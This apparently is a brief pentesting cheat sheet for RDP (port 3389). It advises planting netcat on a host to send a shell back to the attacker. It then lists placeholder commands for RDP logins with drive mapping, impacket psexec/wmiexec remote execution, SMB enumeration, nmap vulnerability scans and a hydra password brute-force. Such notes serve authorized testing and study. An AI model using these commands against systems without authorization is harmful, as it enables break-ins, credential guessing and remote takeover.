3389 - RDP

If you get RDP access, first transfer nc.exe (Windows) or netcat (Linux) to the host so you can get a shell back to your attacking machine.

Handy commands:

  1. xfreerdp: xfreerdp /v:<IP> /u:<USER> /d:<DOMAIN> /p:<PASS> +clipboard /dynamic-resolution /drive:share,/opt

  2. rdesktop: rdesktop -u <username> <IP>

  3. rdesktop (with domain and password): rdesktop -d <domain> -u <username> -p <pass> <IP>

  4. psexec: impacket-psexec <user>:<pass>@<IP>

  5. smbclient: smbclient \\\\<IP>\\<share> -U <user>

  6. Nmap: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

  7. Bruteforce: hydra -L <users.txt> -P <pass.txt> <IP> rdp

  8. smbmap: smbmap -d <domain> -u <user> -p <pass> -H <IP>

  9. wmiexec: impacket-wmiexec <domain>/<user>:<pass>@<IP>